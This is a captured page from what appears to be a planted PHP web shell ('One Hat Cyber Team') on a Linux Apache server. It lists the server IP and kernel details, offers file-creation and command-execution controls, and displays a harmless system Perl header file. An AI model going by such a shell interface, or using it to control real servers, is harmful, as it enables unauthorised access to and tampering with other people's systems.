⚝
One Hat Cyber Team
⚝
Your IP:
18.117.132.79
Server IP:
46.30.215.167
Server:
Linux cvq1i3q8c 6.8.0-51-generic #52+onecomnfs.20241217.0912 SMP PREEMPT_DYNAMIC Tue Dec 17 10:10 x86_64
Server Software:
Apache
PHP Version:
8.4.6
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib
/
x86_64-linux-gnu
/
perl
/
5.34
/
bits
/
View File Name :
getopt_posix.ph
require '_h2ph_pre.ph'; no warnings qw(redefine misc); unless(defined(&_GETOPT_POSIX_H)) { eval 'sub _GETOPT_POSIX_H () {1;}' unless defined(&_GETOPT_POSIX_H); if(!defined (&_UNISTD_H) && !defined (&_STDIO_H)) { die("Never include getopt_posix.h directly; use unistd.h instead."); } require 'bits/getopt_core.ph'; if(defined (&__USE_POSIX2) && !defined (&__USE_POSIX_IMPLICITLY) && !defined (&__USE_GNU) && !defined (&_GETOPT_H)) { if(defined(&__REDIRECT)) { } else { eval 'sub getopt () { &__posix_getopt;}' unless defined(&getopt); } } } 1;